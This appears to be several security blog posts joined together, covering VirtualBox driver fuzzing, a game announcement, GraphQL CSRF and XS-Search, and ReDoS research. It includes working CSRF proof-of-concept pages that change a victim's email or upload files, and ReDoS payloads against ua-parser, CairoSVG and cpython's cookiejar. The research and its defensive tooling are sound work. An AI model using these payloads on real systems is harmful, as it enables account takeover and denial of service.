{
PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;
// if (!strcmp(pReg->szName, "pci")) {continue;}
if (!strcmp(pReg->szName, "ich9pci")) {continue;}
if (!strcmp(pReg->szName, "pcarch")) {continue;}
if (!strcmp(pReg->szName, "pcbios")) {continue;}
if (!strcmp(pReg->szName, "ioapic")) {continue;}
if (!strcmp(pReg->szName, "pckbd")) {continue;}
if (!strcmp(pReg->szName, "piix3ide")) {continue;}
if (!strcmp(pReg->szName, "i8254")) {continue;}
if (!strcmp(pReg->szName, "i8259")) {continue;}
if (!strcmp(pReg->szName, "hpet")) {continue;}
if (!strcmp(pReg->szName, "smc")) {continue;}
if (!strcmp(pReg->szName, "flash")) {continue;}
if (!strcmp(pReg->szName, "efi")) {continue;}
if (!strcmp(pReg->szName, "mc146818")) {continue;}
if (!strcmp(pReg->szName, "vga")) {continue;}
// if (!strcmp(pReg->szName, "VMMDev")) {continue;}
// if (!strcmp(pReg->szName, "pcnet")) {continue;}
if (!strcmp(pReg->szName, "e1000")) {continue;}
if (!strcmp(pReg->szName, "virtio-net")) {continue;}
// if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
if (!strcmp(pReg->szName, "ichac97")) {continue;}
if (!strcmp(pReg->szName, "sb16")) {continue;}
if (!strcmp(pReg->szName, "hda")) {continue;}
if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
if (!strcmp(pReg->szName, "acpi")) {continue;}
if (!strcmp(pReg->szName, "8237A")) {continue;}
if (!strcmp(pReg->szName, "i82078")) {continue;}
if (!strcmp(pReg->szName, "serial")) {continue;}
if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
if (!strcmp(pReg->szName, "parallel")) {continue;}
if (!strcmp(pReg->szName, "ahci")) {continue;}
if (!strcmp(pReg->szName, "buslogic")) {continue;}
if (!strcmp(pReg->szName, "pcibridge")) {continue;}
if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
if (!strcmp(pReg->szName, "GIMDev")) {continue;}
if (!strcmp(pReg->szName, "lpc")) {continue;}
/*
* Gather a bit of config.
*/
/* trusted */
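The chain of strcmp/continue statements is a denylist: any device not named in it is still instantiated. If you prefer to state only the devices to keep, an allowlist is an alternative; the sketch below is a hypothetical helper, not code from PDMDevice.cpp, and keeps the same four devices that the commented-out lines preserve. Note the behavioral difference: with an allowlist, devices added in a future release are skipped by default.

```cpp
#include <set>
#include <string>

// Hypothetical allowlist: returns true only for devices the PCNet harness needs.
// Inside pdmR3DevInit it could replace the chain as:
//     if (!shouldInstantiate(pReg->szName)) continue;
bool shouldInstantiate(const std::string& name) {
    static const std::set<std::string> kKeep = {"pci", "VMMDev", "pcnet", "IntNetIP"};
    return kKeep.count(name) != 0;
}
```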
The most significant issue is that minimizing our test cases is not an option when stability is low (the exact percentage depends on the drivers we fuzz). If we cannot reproduce a crash, we can at least intercept it and analyze it afterward in gdb.
As a workaround, we ran AFL in debug mode, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled with:
$ export AFL_DEBUG=1
$ ulimit -c unlimited
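If the fuzzer is started from a small wrapper program rather than an interactive shell, a similar effect can be obtained with setrlimit. The sketch below raises the soft core-size limit to the hard limit, which matches ulimit -c unlimited when the hard limit is already unlimited; the limit is inherited by child processes such as afl-fuzz and its targets. On Ubuntu, also check /proc/sys/kernel/core_pattern, since AFL++ inspects it at startup and core files may otherwise be piped to a crash handler.

```cpp
#include <sys/resource.h>

// Sketch: raise this process's soft RLIMIT_CORE to the hard limit.
// Returns false if either system call fails.
bool enableCoreDumps() {
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return false;
    rl.rlim_cur = rl.rlim_max;  // raising the soft limit up to the hard limit needs no privileges
    return setrlimit(RLIMIT_CORE, &rl) == 0;
}
```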
We presented one of the possible approaches to fuzzing VirtualBox device drivers, and we hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with a quote from doc/VBox-CodingGuidelines.cpp:
* (2) "A really advanced hacker comes to understand the true inner workings of
* the machine - he sees through the language he's working in and glimpses
* the secret functioning of the binary code - becomes a Ba'al Shem of
* sorts." (Neal Stephenson "Snow Crash")
As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing our line of business - just having fun with computers!
We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle, we’re always challenging ourselves to improve the craft.
During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our spare time in 2020 working on the core mechanics and graphics. Unfortunately, limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a side project shared by two thriving businesses.
Despite everything, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play game with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks!
No malware included.
H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame on gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!
While playing, you might end up talking to John or Luca.
Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:
With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.
GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:
Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.
POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept only Content-Type headers set to application/json, which is widely believed to be invulnerable to CSRF. However, as multiple layers of middleware may translate incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forgo implementing proper CSRF protections.
The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:
POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...
{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}
It is common, due to middleware magic, to have a server accepting the same request as a form-urlencoded POST request:
POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...
query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
A seasoned Burp user can quickly convert this request into a CSRF PoC through Engagement Tools > Generate CSRF PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://redacted/graphql" method="POST">
<input type="hidden" name="query" value="{   user {     firstName     __typename   } } " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
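The urlencoded body from the request above can also be produced with a few lines of code, which helps when scripting such PoCs. The sketch below implements application/x-www-form-urlencoded encoding (alphanumerics and *-._ kept, spaces as +, everything else as %XX); formUrlEncode is a hypothetical helper name. Assuming the query uses the two-space indentation implied by the encoded body, it yields exactly the 72-byte body shown earlier.

```cpp
#include <cctype>
#include <cstdio>
#include <string>

// Encodes a value as application/x-www-form-urlencoded: alphanumerics and
// "*-._" pass through, spaces become '+', and every other byte becomes %XX.
std::string formUrlEncode(const std::string& value) {
    std::string out;
    for (unsigned char c : value) {
        if (std::isalnum(c) || c == '*' || c == '-' || c == '.' || c == '_') {
            out += static_cast<char>(c);
        } else if (c == ' ') {
            out += '+';
        } else {
            char hex[4];
            std::snprintf(hex, sizeof(hex), "%%%02X", c);
            out += hex;
        }
    }
    return out;
}
```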
While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the way requests reach them, any other query can be issued, including mutations.
There are two common issues that we have spotted during our past engagements.
The first one is using GET requests for both queries and mutations.
For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.
While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wide.
As an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:
<!DOCTYPE html>
<html>
<head>
<title>GraphQL CSRF file upload</title>
</head>
<body>
<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!)%20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType)%20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
</body>
</html>
The second issue arises when a state-changing GraphQL operation is exposed as a query, which is normally non-state-changing. In fact, most GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issue is trivial: enumerate the query names and try to understand what they do. For this reason, we developed a tool for query/mutation enumeration.
During an engagement, we discovered the following query that was issuing a state changing operation:
req := graphql.NewRequest(`
query SetUserEmail($email: String!) {
SetUserEmail(user_email: $email) {
id
email
}
}
`)
Given that the id value was easily guessable, we were able to prepare a CSRF PoC:
<!DOCTYPE html>
<html>
<head>
<title>GraphQL CSRF - State Changing Query</title>
</head>
<body>
<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%0A%7D"></iframe>
</body>
</html>
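When a GraphQL endpoint accepts GET, an operation travels as separately encoded query and variables parameters joined by a literal &. If the separator itself were percent-encoded (%26variables%3D), the server would see a single query parameter with the variables glued onto it. A hypothetical helper that builds such URLs with RFC 3986 percent-encoding might look like this:

```cpp
#include <cctype>
#include <cstdio>
#include <string>

// Percent-encodes everything except RFC 3986 unreserved characters, so '&',
// '=' and '#' inside a value cannot be mistaken for URL syntax.
std::string percentEncode(const std::string& value) {
    std::string out;
    for (unsigned char c : value) {
        if (std::isalnum(c) || c == '-' || c == '.' || c == '_' || c == '~') {
            out += static_cast<char>(c);
        } else {
            char hex[4];
            std::snprintf(hex, sizeof(hex), "%%%02X", c);
            out += hex;
        }
    }
    return out;
}

// Builds a GET URL for a GraphQL operation: query and variables are encoded
// separately and joined with a literal '&', yielding two distinct parameters.
std::string graphqlGetUrl(const std::string& endpoint, const std::string& query,
                          const std::string& variablesJson) {
    return endpoint + "?query=" + percentEncode(query) +
           "&variables=" + percentEncode(variablesJson);
}
```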
Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:
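from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from graphene_django.views import GraphQLView

urlpatterns = [
    # ...
    path("graphql", csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
]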
Some browsers, such as Chrome, recently started treating cookies without an explicit SameSite attribute as SameSite=Lax by default, which protects against the most common CSRF vectors.
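What Lax-by-default means for GET- and form-based PoCs can be summarized in a tiny model. The sketch below is a deliberate simplification of the SameSite=Lax rules: a cross-site request carries the cookie only on a top-level navigation with a safe method such as GET. It ignores Chrome’s temporary "Lax + POST" allowance for recently set cookies without an explicit SameSite attribute, among other details; the enum and function names are illustrative.

```cpp
// Simplified, illustrative model of SameSite=Lax for cross-site requests.
enum class Method { Get, Post };
enum class Context { TopLevelNavigation, Iframe, Subresource };

bool laxCookieSentCrossSite(Method method, Context context) {
    // Lax only allows cross-site sending on top-level navigations that use a
    // safe method such as GET.
    return context == Context::TopLevelNavigation && method == Method::Get;
}
```

Under this model, iframe-based GET PoCs and auto-submitted POST forms arrive without the session cookie, whereas a state-changing GET reached through a top-level navigation (for example, a link the victim clicks) still carries it.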
Other prevention methods can be implemented within each application. The most common are:
GET request for state changing operations
GET request too
There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.
In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.
For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm their existence or accessibility.
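Once a yes/no answer can be obtained for a prefix, the search loop itself is simple. A minimal sketch, assuming a hypothetical oracle(prefix) that returns True when the victim-side search for that prefix has results. In a real XS-Search that answer comes from a timing side channel measured in the victim's browser, which is the hard part and is simulated here by a plain function over a made-up set of filenames.

```python
import string
from typing import Callable, List


def enumerate_by_prefix(oracle: Callable[[str], bool],
                        alphabet: str = string.ascii_lowercase + string.digits + "._-",
                        max_len: int = 64) -> List[str]:
    """Grow prefixes one character at a time, keeping those the oracle confirms.

    A name that is also the prefix of a longer name (e.g. "a" and "ab") is only
    reported in its longest form.
    """
    found = []
    frontier = [""]
    while frontier:
        prefix = frontier.pop()
        extended = False
        if len(prefix) < max_len:
            for ch in alphabet:
                if oracle(prefix + ch):
                    frontier.append(prefix + ch)
                    extended = True
        if prefix and not extended:
            found.append(prefix)
    return sorted(found)


# Simulated oracle standing in for the timing side channel (hypothetical data).
SECRET_FILES = {"backup.sql", "passwords.txt"}


def fake_oracle(prefix: str) -> bool:
    return any(name.startswith(prefix) for name in SECRET_FILES)


print(enumerate_by_prefix(fake_oracle))  # ['backup.sql', 'passwords.txt']
```

Each confirmed character costs at most len(alphabet) oracle queries, which is why a reliable timing measurement matters more than the search strategy.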
Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.
XS-Search is quite a neat and simple technique which can transform the following query into an attacker-controlled binary search (e.g. we can enumerate the users of a private platform):
query {
  isEmailAvailable(email:"foo@bar.com") {
    is_email_available
  }
}
In HTTP GET form:
GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...
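Hand-encoding that query string is tedious. A minimal sketch with Python's urllib.parse (graphql_get_url is a hypothetical helper name) reproduces the request line above; the optional variables argument shows how a JSON variables object goes in its own query parameter instead of being appended to the query text.

```python
from typing import Optional
from urllib.parse import urlencode


def graphql_get_url(endpoint: str, query: str, variables: Optional[str] = None) -> str:
    """Build a GraphQL-over-GET URL; urlencode() escapes values with quote_plus."""
    params = {"query": query}
    if variables is not None:
        params["variables"] = variables  # JSON-encoded variables, if the operation needs them
    return endpoint + "?" + urlencode(params)


QUERY = 'query {\n\tisEmailAvailable(email:"foo@bar.com") {\n\t\tis_email_available\n\t}\n}'
print(graphql_get_url("/graphql", QUERY))
```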
The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.
As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.
For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.
InQL v4 can assist in detecting these issues by identifying various classes of CSRF through new “Send to Repeater” helpers (GET query parameters, POST form-data and POST x-www-form-urlencoded), and by improving the query generation.
We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days, and neither conclusiveness nor completeness should be inferred, the numbers show a strikingly high count of unpatched vulnerabilities:
TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!
When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is the misuse of regular expressions (regexes).
Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.
In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.
🚀 @doyensec/regexploit: pip install regexploit and find some bugs.
To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:
(.+)\.(.+)\.(.+)
That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?
The first .+ capture group greedily matches all the way to the end of the string, since the dot matches any character (other than a newline): $1="123.456.789".
The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+ until it successfully matches a dot: $1="123.456".
The second capture group matches the final three digits, $2="789", but we need another dot, so it has to backtrack.
Hmmm… it seems that maybe the match for capture group 1 is incorrect; let’s try backtracking.
OK, let’s try with $1="123", and let’s match group 2 greedily all the way to the end: $2="456.789", but now there’s no dot! That can’t be the correct group 2…
After group 2 backtracks to "456", we finally have a successful match: $1="123", $2="456", $3="789".
As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
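The version-number regex is easy to make unambiguous: if no group can consume the separator, there is only one way to split the input and nothing for the engine to backtrack into. A small Python comparison; the UNAMBIGUOUS pattern is our own illustration, not taken from any particular project.

```python
import re

AMBIGUOUS = re.compile(r"(.+)\.(.+)\.(.+)")
# Each group excludes the separator, so a dot can only ever match the literal \.
UNAMBIGUOUS = re.compile(r"([^.]+)\.([^.]+)\.([^.]+)")

version = "123.456.789"
print(AMBIGUOUS.fullmatch(version).groups())    # ('123', '456', '789')
print(UNAMBIGUOUS.fullmatch(version).groups())  # ('123', '456', '789')
print(UNAMBIGUOUS.fullmatch("1.2"))             # None
```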
If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019.
In runtimes like NodeJS, the Event Loop will be blocked, which stalls all timers, awaits, requests and responses until regex processing completes.
Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:
; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
If we look closer at the end part we can see three overlapping repeating groups:
\d+[^\);]+[^\);]*\)
Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis.
The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).
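The ½(N-1)N figure can be checked by brute force: give a ≥ 1 digits to \d+, b ≥ 1 to [^\);]+, and whatever remains to [^\);]*. A short Python check; note that it counts complete splits only, not the individual steps a real engine takes while backtracking through partial ones.

```python
from itertools import product


def count_splits(n: int) -> int:
    r"""Count the ways n digits can be shared between \d+ (at least 1),
    [^\);]+ (at least 1) and [^\);]* (whatever is left, possibly 0)."""
    return sum(1 for a, b in product(range(1, n + 1), repeat=2) if a + b <= n)


for n in (3, 10, 100):
    # Brute force agrees with the closed form ½(N-1)N.
    assert count_splits(n) == n * (n - 1) // 2
    print(n, count_splits(n))
```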
This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.
Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.
Several tools already exist to find regexes with exponential worst-case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging.
Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts.
Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.
The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:
Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456
The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.
User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...
To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.
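Extraction is mostly a parsing exercise. As a rough illustration of the idea for Python sources (this is not Regexploit's implementation), the hypothetical extract_regexes helper below walks the AST and collects string literals passed as the first argument to functions of the re module. Patterns built dynamically, or calls through an aliased import, are missed. Printing one pattern per line is enough to feed single-line regexes to a script that reads them from stdin, such as regexploit.

```python
import ast
import sys
from typing import List

# re module functions whose first argument is a pattern.
RE_FUNCTIONS = {"compile", "match", "fullmatch", "search", "findall",
                "finditer", "sub", "subn", "split"}


def extract_regexes(source: str) -> List[str]:
    """Return literal patterns passed to re.<function>(...) calls in source."""
    patterns = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        func = node.func
        if (isinstance(func.value, ast.Name) and func.value.id == "re"
                and func.attr in RE_FUNCTIONS and node.args
                and isinstance(node.args[0], ast.Constant)
                and isinstance(node.args[0].value, str)):
            patterns.append(node.args[0].value)
    return patterns


if __name__ == "__main__" and len(sys.argv) > 1:
    # Example: python extract_regexes.py some_module.py | regexploit
    with open(sys.argv[1], encoding="utf-8") as fh:
        for pattern in extract_regexes(fh.read()):
            print(pattern)
```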
Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.
So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.
We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.
The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages, e.g. Markdown, CSS, Matlab or SVG, is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.
A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:
rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456
The developer wants to find strings like rgba( 100,200, 10, 0.5 ) and extract the middle part without surrounding spaces. Unfortunately, the .+? in the middle also accepts spaces.
If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.
Let’s take a look at the matching process with the input "rgba(" + " " * 19:
What a load of wasted CPU cycles!
A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:
Pattern: ^
(\d\d?) # day
(?:\s+|[-\/])
(\w+) # month
(?:\s+|[-\/])
(\d+) # year
(?:
(?:\s+|:) # separator before clock
(\d\d?):(\d\d) # hour:min
(?::(\d\d))? # optional seconds
)? # optional clock
\s*
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
\s*
(?:\(\w+\))? # ASCII representation of timezone in parens.
\s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'
It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats.
The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.
A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:
Set-Cookie: b;Expires=1-c-1 X
With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.
Again, the issue was designing the regex to handle whitespace between optional sections.
Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.
Sorry, I wanted to shoehorn this comic in somewhere
So why didn’t I bother looking for ReDoS in Golang? Go’s regexp package follows the RE2 design and does not backtrack.
Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input.
There was a trade-off though.
Depending on your use-case, libraries like re2 may not be the fastest engines.
There are also some regex features such as backreferences which had to be dropped.
But in the pathological case, regexes won’t be what takes down your website.
There are re2 libraries for many languages, so you can use it in preference to Python’s re module.
For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
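For the CairoSVG pattern, that approach could look like the sketch below. It is not the fix CairoSVG actually shipped: the hypothetical parse_rgba helper matches everything up to the closing parenthesis with a character class that cannot consume it, then strips the whitespace in Python. It is only roughly equivalent to the original (str.strip() removes any whitespace, and "rgba( )" is rejected rather than captured), but it leaves the engine a single way to match.

```python
import re
from typing import Optional

# Pattern from the CairoSVG finding: three parts can all consume the same whitespace.
VULNERABLE = re.compile(r"rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)")
# [^)]* can never consume the closing parenthesis, so there is only one way to match.
SIMPLE = re.compile(r"rgba\(([^)]*)\)")


def parse_rgba(value: str) -> Optional[str]:
    """Extract the rgba(...) arguments, then strip surrounding whitespace in Python."""
    match = SIMPLE.search(value)
    if match is None:
        return None
    inner = match.group(1).strip()
    return inner or None  # treat "rgba()" as no match, like the original pattern


print(parse_rgba("rgba( 100,200, 10, 0.5 )"))       # 100,200, 10, 0.5
print(parse_rgba("rgba(" + " " * 100_000) is None)  # True, and returns quickly
```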
In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”.
While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack.
In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.